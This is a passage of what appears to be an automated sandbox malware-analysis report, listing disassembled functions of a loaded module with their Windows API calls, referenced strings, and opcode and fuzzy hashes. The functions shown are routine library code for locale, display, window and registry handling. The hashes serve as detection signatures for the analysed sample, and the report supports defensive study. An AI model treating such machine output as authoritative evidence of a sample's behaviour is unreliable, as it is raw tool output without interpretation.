                                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8D31
                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 6FAC8D3A
                                          • GetModuleFileNameW.KERNEL32(6FAC0000,?,00000105), ref: 6FAC8D7F
                                          • _memset.LIBCMT ref: 6FAC8D9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                          • API String ID: 3537336938-2299501126
                                          • Opcode ID: 5a746e0c7953ae767c6547c93d350f79ef5425d82226d33916696d8aecbb796e
                                          • Instruction ID: 5f47eb518bcb00ccde0c3efa0cbfb45cf87dff8f5709c7f1eea16da4543afdf2
                                          • Opcode Fuzzy Hash: 5a746e0c7953ae767c6547c93d350f79ef5425d82226d33916696d8aecbb796e
                                          • Instruction Fuzzy Hash: B8513A71D052289ECB60EFA99D887ADB7B4FF58314F1001EAA448E3280DB789EC1DF55
                                          Function 6FACDCCE Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6FACDE36,?,?,?,?,?,?,?,6FACFCC6,00000000,00000002,00000028), ref: 6FACDCF9
                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FACDD15
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FACDD2A
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FACDD3B
                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FACDD4C
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FACDD5D
                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FACDD6E
                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FACDD8E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                          • API String ID: 667068680-2451437823
                                          • Opcode ID: 25795f7cf74681c83a806b8c9cf7f301435771f0ec42710e38e62ae350c26e16
                                          • Instruction ID: 1c808afbe233ce8727d062bd3f36d77c8bf06d60f71625520e90eea4346f1182
                                          • Opcode Fuzzy Hash: 25795f7cf74681c83a806b8c9cf7f301435771f0ec42710e38e62ae350c26e16
                                          • Instruction Fuzzy Hash: D9218E71856B629F8B016F74EFC446A7AE5B64BA31314C53FD42DEA108C37810D6DB21
                                          Function 6FACFBD6 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FAD2C57: GetWindowLongW.USER32(?,000000F0), ref: 6FAD2C62
                                          • GetParent.USER32(?), ref: 6FACFC05
                                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FACFC28
                                          • GetWindowRect.USER32(?,?), ref: 6FACFC42
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FACFC58
                                          • CopyRect.USER32(?,?), ref: 6FACFCA5
                                          • CopyRect.USER32(?,?), ref: 6FACFCAF
                                          • GetWindowRect.USER32(00000000,?), ref: 6FACFCB8
                                            • Part of subcall function 6FACDE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FACDED6
                                          • CopyRect.USER32(?,?), ref: 6FACFCD4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                                          • String ID: (
                                          • API String ID: 1385303425-3887548279
                                          • Opcode ID: 3731607c3456dd2334285f2c521b0c1b1b9ee912e49ecfcaef9de8b00359bb04
                                          • Instruction ID: 9b79d54d9779ee234a7a66edd8a2310d45e755ad0d333b37c5afa712ad3298e8
                                          • Opcode Fuzzy Hash: 3731607c3456dd2334285f2c521b0c1b1b9ee912e49ecfcaef9de8b00359bb04
                                          • Instruction Fuzzy Hash: 24513172A04619ABDB01CBA8CD84AEEBBB9AF48314F194119F915F7180D734E945CBA1
                                          Function 6FADA11F Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FAEE928,0000000C,6FADA25A,00000000,00000000,?,6FADA5D4,00000000,00000001,00000000,?,6FADA89E,00000018,6FAEE978,0000000C), ref: 6FADA131
                                          • __crt_waiting_on_module_handle.LIBCMT ref: 6FADA13C
                                            • Part of subcall function 6FAD5BCF: Sleep.KERNEL32(000003E8,00000000,?,6FADA082,KERNEL32.DLL,?,?,6FADA416,00000000,?,6FAD488C,00000000,?,?,?,6FAD48EF), ref: 6FAD5BDB
                                            • Part of subcall function 6FAD5BCF: GetModuleHandleW.KERNEL32(00000000,?,6FADA082,KERNEL32.DLL,?,?,6FADA416,00000000,?,6FAD488C,00000000,?,?,?,6FAD48EF,?), ref: 6FAD5BE4
                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FADA165
                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6FADA175
                                          • __lock.LIBCMT ref: 6FADA197
                                          • InterlockedIncrement.KERNEL32(?), ref: 6FADA1A4
                                          • __lock.LIBCMT ref: 6FADA1B8
                                          • ___addlocaleref.LIBCMT ref: 6FADA1D6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                          • API String ID: 1028249917-2843748187
                                          • Opcode ID: 64f311ecb92b3a3bd72a2e88fccab93a0d46626ee715ad467a02a0ebe5bb27c6
                                          • Instruction ID: e7f307356ae5030321db30e7aa5c52f7a9be96200dbcca6f7ac69581ba51ab2a
                                          • Opcode Fuzzy Hash: 64f311ecb92b3a3bd72a2e88fccab93a0d46626ee715ad467a02a0ebe5bb27c6
                                          • Instruction Fuzzy Hash: EB11AF71805B019ED7209F79C900B9ABBF5AF45328F108519F49A972D0CB7CAAC1EF64
                                          Function 6FAC84DA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FAC8503
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FAC8520
                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FAC852D
                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FAC853A
                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FAC8547
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 667068680-2424895508
                                          • Opcode ID: 18192311bcbe804000e4cd9942b87613b38333237eeee7aa74a5f8625cc07166
                                          • Instruction ID: 888f077750f55363f9987422fde539afe8207eb04c4615c6221b996c8275b374
                                          • Opcode Fuzzy Hash: 18192311bcbe804000e4cd9942b87613b38333237eeee7aa74a5f8625cc07166
                                          • Instruction Fuzzy Hash: 7A1194B180F756AFCF109F699A8A446BFB8BB52325708803FE14ACB200D77894D1DB13
                                          Function 6FACA59C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32,6FACA6B6), ref: 6FACA5AA
                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FACA5CB
                                          • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FACA5DD
                                          • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FACA5EF
                                          • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FACA601
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                          • API String ID: 417325364-2424895508
                                          • Opcode ID: 3dedbbf2324d207d3e809fa10d9e05121c3a056ac16b3d97fa421c7e271bb52a
                                          • Instruction ID: fd4a772fcacc129fb10b15757415d61ef035585e3cf6116ae9eeb2de5b193b82
                                          • Opcode Fuzzy Hash: 3dedbbf2324d207d3e809fa10d9e05121c3a056ac16b3d97fa421c7e271bb52a
                                          • Instruction Fuzzy Hash: 4DF01274C0FB35AFCF415FB5AD055157F69BB16235700C41AA880DB200D77880A6EF43
                                          Function 6FAC1C00 Relevance: 13.7, APIs: 9, Instructions: 159fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FAC1BE9,?,?,?,?), ref: 6FAC1C39
                                          • GetLastError.KERNEL32(?,?,?,?,?,6FAC1BE9,?,?,?,?), ref: 6FAC1C48
                                          • __aullrem.LIBCMT ref: 6FAC1C60
                                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FAC1CE8
                                          • _memset.LIBCMT ref: 6FAC1CF5
                                          • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FAC1BE9,?,?,?,?), ref: 6FAC1D07
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                                          • String ID:
                                          • API String ID: 123228641-0
                                          • Opcode ID: 3aac2947e396d4b70683956daaeae6902a56a3b4747666a3b8367ec384a99fcd
                                          • Instruction ID: 9d69fe6dd4090a734fe04ea6421bd4fb98c00a70cf2dab163bb944ba4fb807ef
                                          • Opcode Fuzzy Hash: 3aac2947e396d4b70683956daaeae6902a56a3b4747666a3b8367ec384a99fcd
                                          • Instruction Fuzzy Hash: 83515071B08701AFD740DF29CC44BABB7E8EF88764F144A29F958D7240E774E9458BA2
                                          Function 6FACBE0D Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 6FACBE14
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 6FACBE25
                                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?,?,?,?), ref: 6FACBE43
                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?), ref: 6FACBE77
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBEE3
                                          • _memset.LIBCMT ref: 6FACBF02
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FACBF13
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FACBF34
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                          • String ID:
                                          • API String ID: 1891723912-0
                                          • Opcode ID: acfd45be81836650e4d5afcc8c51a05644c74f245d1cf87623b16ba331659a6b
                                          • Instruction ID: cdb4cc5875a1245a052cdceee9dc7b1d1d7fbd7e6c4b63976e7a9f4479351a95
                                          • Opcode Fuzzy Hash: acfd45be81836650e4d5afcc8c51a05644c74f245d1cf87623b16ba331659a6b
                                          • Instruction Fuzzy Hash: 6F318174404705EFDB14DF24C984C9ABBB5FF05364B10C62AE6599B690C73AE990CF92
                                          Function 6FAC81FA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FAC815A: GetParent.USER32(?), ref: 6FAC81AE
                                            • Part of subcall function 6FAC815A: GetLastActivePopup.USER32(?), ref: 6FAC81BF
                                            • Part of subcall function 6FAC815A: IsWindowEnabled.USER32(?), ref: 6FAC81D3
                                            • Part of subcall function 6FAC815A: EnableWindow.USER32(?,00000000), ref: 6FAC81E6
                                          • EnableWindow.USER32(?,00000001), ref: 6FAC8247
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 6FAC825B
                                          • GetCurrentProcessId.KERNEL32(?,?), ref: 6FAC8265
                                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FAC827D
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FAC82F9
                                          • EnableWindow.USER32(00000000,00000001), ref: 6FAC8340
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                          • String ID: 0
                                          • API String ID: 1877664794-4108050209
                                          • Opcode ID: d32408310e8d30c36cb79e38f7da7b2d0f4efd4a557196c530fdc1108f9645cc
                                          • Instruction ID: 5a5aeefa73f2b52653bb908f59f27b558939ec203605ee1024b3867dd75aa332
                                          • Opcode Fuzzy Hash: d32408310e8d30c36cb79e38f7da7b2d0f4efd4a557196c530fdc1108f9645cc
                                          • Instruction Fuzzy Hash: 5C41D371A08B19ABDB20CF64CD88BDA77B4FF05710F180599E925E6280D774EEC0CB91
                                          Function 6FACDE96 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FACDED6
                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FACDF00
                                          • GetSystemMetrics.USER32(00000000), ref: 6FACDF17
                                          • GetSystemMetrics.USER32(00000001), ref: 6FACDF1E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FACDF49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                          • String ID: B$DISPLAY
                                          • API String ID: 381819527-3316187204
                                          • Opcode ID: 953ca81d49b54c214ef1035f4868f84f4325dd7f9a69a5476f2f9df1c022f2ac
                                          • Instruction ID: e8abe93a556191512b7aac430c2272419fb28dcc5d91a19f555ce034e8d7abee
                                          • Opcode Fuzzy Hash: 953ca81d49b54c214ef1035f4868f84f4325dd7f9a69a5476f2f9df1c022f2ac
                                          • Instruction Fuzzy Hash: 5721C771544724ABDF108F148D44A9B7BAAFF46B60F048516FD389E184D6B4D481CBE2
                                          Function 6FACCD66 Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemMetrics.USER32(0000000B), ref: 6FACCD75
                                          • GetSystemMetrics.USER32(0000000C), ref: 6FACCD7C
                                          • GetSystemMetrics.USER32(00000002), ref: 6FACCD83
                                          • GetSystemMetrics.USER32(00000003), ref: 6FACCD8D
                                          • GetDC.USER32(00000000), ref: 6FACCD97
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 6FACCDA8
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FACCDB0
                                          • ReleaseDC.USER32(00000000,00000000), ref: 6FACCDB8
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1151147025-0
                                          • Opcode ID: c71b3de3606543733f5824f327163cb802db03eb4d0b326b53a9cff48bb00164
                                          • Instruction ID: deb6f292ad2254697693a5d590c2de4fe7e14298342aa4d4c9e215b299906518
                                          • Opcode Fuzzy Hash: c71b3de3606543733f5824f327163cb802db03eb4d0b326b53a9cff48bb00164
                                          • Instruction Fuzzy Hash: 07F06DB1E40B15BAEB105B728C49F577F68EB82731F008516E6049B2C0CAB698228FD0
                                          Function 6FAD020C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 6FAD029B
                                          • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FAD02C4
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FAD02D6
                                          • GetWindowLongW.USER32(?,000000FC), ref: 6FAD02E7
                                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FAD0303
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend_memset
                                          • String ID: ,
                                          • API String ID: 2997958587-3772416878
                                          • Opcode ID: 81f411086fd93f1e4f5bd35ef2fb664c28ae9cc6cb209824a3589ffe0e86661b
                                          • Instruction ID: 59c5d87d1a47aaf5abb19fa6f380cd5bcd7cf62ee7866c4726ff4679b603ce14
                                          • Opcode Fuzzy Hash: 81f411086fd93f1e4f5bd35ef2fb664c28ae9cc6cb209824a3589ffe0e86661b
                                          • Instruction Fuzzy Hash: 0131F4706017109FDB109FB4C988AADBBF5BF48314F15522DF6559B690DB78F480CB94
                                          Function 6FACA200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 6FACA20A
                                          • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FACA2F0
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FACA30D
                                          • RegCloseKey.ADVAPI32(?), ref: 6FACA32D
                                          • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FACA348
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                          • String ID: Software\
                                          • API String ID: 1666054129-964853688
                                          • Opcode ID: 64e465a427c4c709fc5ec9d4d6a5a0c731fe876d4c77d0815690e060f738329a
                                          • Instruction ID: 2a8c41260ad29553d1087a25b092791d887a02e78cc8637e389c24a5339e0b3d
                                          • Opcode Fuzzy Hash: 64e465a427c4c709fc5ec9d4d6a5a0c731fe876d4c77d0815690e060f738329a
                                          • Instruction Fuzzy Hash: 4E41A631901628ABCB21DBA4DD98EEEB7B9AF49314F1406D5E119E2190DB38DBC0DF51
                                          Function 6FACA082 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_catch_GS.LIBCMT ref: 6FACA08C
                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FACA11A
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FACA13D
                                            • Part of subcall function 6FACA02D: __EH_prolog3.LIBCMT ref: 6FACA034
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                                          • String ID: Software\Classes\
                                          • API String ID: 3518408925-1121929649
                                          • Opcode ID: 5fe54ef680e9e3134c2de941ef00f536ef8b788863b679682936140df2fd31e0
                                          • Instruction ID: 552c985dca0658680dcf98166acc36a08542064768324a1527df10516d5fe737
                                          • Opcode Fuzzy Hash: 5fe54ef680e9e3134c2de941ef00f536ef8b788863b679682936140df2fd31e0
                                          • Instruction Fuzzy Hash: 6331A631D00228ABCB21EBA4DD58BEDB7B9AF09324F1402D5E85967290D7385FC4DF52
                                          Function 6FACD07E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                                          Download Yara Rule
